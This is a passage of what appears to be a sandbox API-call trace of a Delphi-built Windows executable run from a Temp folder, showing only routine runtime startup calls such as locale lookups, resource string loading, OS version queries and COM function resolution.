lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.877] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] 
RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] GetUserDefaultUILanguage () returned 0x409 [0096.880] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0096.880] GetThreadUILanguage () returned 0x120409 [0096.880] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0096.880] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0096.880] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] GetUserDefaultUILanguage () returned 0x409 [0096.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0096.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: 
lpBuffer="Variant method calls not supported") returned 0x22 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | 
out: lpBuffer="Range check error") returned 0x11 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0096.882] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.882] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0096.883] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x154448 [0096.884] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0096.884] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff9, 
lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0096.884] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.884] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0096.884] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0096.884] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] GetThreadLocale () returned 0x409 [0096.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0096.884] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0096.885] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.885] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0096.885] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0096.885] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x154458 [0096.885] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0096.885] 
GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0096.885] GetLastError () returned 0x7a [0096.885] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0096.885] GetThreadLocale () returned 0x409 [0096.885] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0096.885] GetThreadLocale () returned 0x409 [0096.885] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: 
lpLCData="Thu") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: 
lpLCData="Jun") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: 
lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0096.889] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0096.889] GetProcAddress (hModule=0x76c10000, 
lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0096.889] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0096.889] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0096.890] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0096.891] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0096.891] CreateEventW 
(lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0096.891] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0096.891] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0096.891] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15368019838) returned 1 [0096.891] GetTickCount () returned 0x2335e [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15368038889) returned 1 [0096.891] GetTickCount () returned 0x2335e [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xa, wMilliseconds=0x2a1)) [0096.891] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0096.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", 
lpUsedDefaultChar=0x0) returned 18 [0096.891] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0096.892] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.892] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 